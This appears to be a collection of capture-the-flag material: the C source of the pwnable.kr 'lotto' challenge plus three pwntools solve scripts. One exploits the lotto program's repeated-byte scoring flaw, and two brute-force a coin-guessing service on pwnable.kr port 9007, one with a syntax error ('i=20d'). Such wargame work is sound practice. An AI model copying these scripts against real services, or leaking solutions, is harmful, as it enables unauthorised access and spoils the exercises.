#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <fcntl.h>

unsigned char submit[6];

void play(){

int i;

printf("Submit your 6 lotto bytes : ");

fflush(stdout);

int r;

r = read(0, submit, 6);

printf("Lotto Start!\n");

//sleep(1);

// generate lotto numbers

int fd = open("/dev/urandom", O_RDONLY);

if(fd==-1){

printf("error. tell admin\n");

exit(-1);

}

unsigned char lotto[6];

if(read(fd, lotto, 6) != 6){

printf("error2. tell admin\n");

exit(-1);

}

for(i=0; i<6; i++){

lotto[i] = (lotto[i] % 45) + 1; // 1 ~ 45

}

close(fd);

// calculate lotto score

int match = 0, j = 0;

for(i=0; i<6; i++){

for(j=0; j<6; j++){

if(lotto[i] == submit[j]){

match++;

}

}

}

// win!

if(match == 6){

system("/bin/cat flag");

}

else{

printf("bad luck...\n");

}

}

void help(){

printf("- nLotto Rule -\n");

printf("nlotto is consisted with 6 random natural numbers less than 46\n");

printf("your goal is to match lotto numbers as many as you can\n");

printf("if you win lottery for *1st place*, you will get reward\n");

printf("for more details, follow the link below\n");

printf("http://www.nlotto.co.kr/counsel.do?method=playerGuide#buying_guide01\n\n");

printf("mathematical chance to win this game is known to be 1/8145060.\n");

}

int main(int argc, char* argv[]){

// menu

unsigned int menu;

while(1){

printf("- Select Menu -\n");

printf("1. Play Lotto\n");

printf("2. Help\n");

printf("3. Exit\n");

scanf("%d", &menu);

switch(menu){

case 1:

play();

break;

case 2:

help();

break;

case 3:

printf("bye\n");

return 0;

default:

printf("invalid menu\n");

break;

}

}

return 0;

}

from pwn import *

r = process('./lotto')

context.log_level='debug'

r.recv(1024)

r.sendline('1')

r.send('\x12\x12\x12\x12\x12\x12')

r.interactive()

from pwn import *

from operator import eq

context.log_level='debug'

flag=0

search='9'

search2 = "Correct! (0)"

r = remote("pwnable.kr", 9007)

print(r.recv(2048))

sleep(3.3)

r.recv(100)

i=20d

while 1:

payload=""

sleep(0.5)

for j in range(10):

payload += " " + str(i+j)

r.sendline(payload)

i+=10

weight = r.recv(10)

if search in weight :

i-=10

print i

break

r.interactive()

from pwn import *

import time

import sys

host = '0'

port = 9007

r = remote(host, port)

time.sleep(3)           # wait for 3 sec.

print r.recv()

cnt = 0

for i in range(100):

    r.recvuntil('N=')

    n = int( r.recvuntil(' ') )

    r.recvuntil('C=')

    c = int( r.recv() )

    st = 1

    des = n

    t = 0

    while(1):

        message = ''

        if(st > des):

            break

        message = ''

        for i in range(st, (st + des) // 2 + 1):

            message += '{0} '.format(i) 

        print "[-] guess : {0}".format(message)

        x = r.sendline(message)

        result = r.recv()

        print "[*] result : {0}".format(result)

        if result.find('Correct') > -1:

            t = 1

            break

        elif result[0] == 'N':

            des = n

        elif result.find('error') > -1:

            break

        elif result.find('time') > -1:

            print "\n\n[x] time expired.."

            sys.exit(1)

        elif int(result) % 10 != 0:

            des = (st + des)//2

        else:

            st = (st+des)//2 + 1

    if(t == 0):

        r.sendline(str(st))

        correctmsg = r.recv()

    cnt += 1

    print "[+] count : {0}\n".format(cnt)

flag = r.recv()

print "\n\n[*] FLAG : {0}".format(flag)